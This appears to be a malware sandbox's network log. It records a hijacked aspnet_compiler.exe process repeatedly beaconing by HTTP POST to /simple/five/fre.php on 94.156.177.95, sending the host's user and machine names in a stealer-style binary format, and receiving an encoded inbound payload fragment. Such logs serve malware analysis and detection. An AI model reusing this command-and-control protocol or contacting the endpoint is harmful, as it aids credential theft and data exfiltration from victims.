Nov 15, 2024 18:14:29.785969019 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsxGZuIzMUVVQFx0TAwGbk5iMzUGbvBAAlNmbhR3culUZ0FWZyN0bDBAEAAQZ6lGbhlGdp5WauV1bDBAbAAQZ6lGbhlGdp5WSvNEA+AAAsxGZuIzMMVkTSV0SAAAc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49761	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:31.421145916 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 180 Connection: close
Nov 15, 2024 18:14:31.426230907 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons927537ALFONS-PCk0FDD42EE188E931437F4FBE2CFomP1
Nov 15, 2024 18:14:32.403141975 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49766	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:32.574347973 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 180 Connection: close
Nov 15, 2024 18:14:32.580657959 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons927537ALFONS-PC+0FDD42EE188E931437F4FBE2CQClad
Nov 15, 2024 18:14:33.527932882 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49771	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:33.643413067 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:33.648797035 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:34.615878105 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49776	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:34.775031090 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:34.779934883 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:35.751368046 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49785	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:35.922072887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:35.927180052 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:36.861615896 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49790	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:37.036499023 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:37.042043924 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:37.994832993 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49795	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:38.150047064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:38.155116081 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:39.112399101 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49801	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:39.305438995 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:39.310498953 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:40.262424946 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49807	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:40.413522005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:40.418720961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:41.384887934 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49811	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:41.534507036 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:41.540422916 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:42.506726980 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49815	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:42.661401033 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:42.666273117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:43.611865044 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49820	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:43.775824070 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:43.780827045 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:44.788902044 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49827	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:44.943254948 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:44.948157072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:47.376245022 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49839	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:47.560796976 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:47.565743923 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:48.529079914 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49845	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:48.727335930 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:48.732748032 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:49.701478958 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49851	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:49.861510992 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:49.866642952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:50.823755026 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49856	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:51.010651112 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:51.015683889 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:51.958895922 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49862	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:52.111242056 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:52.116189003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:53.063715935 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49869	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:53.226959944 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:53.231993914 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:54.207930088 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49875	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:54.408966064 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:54.415832996 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
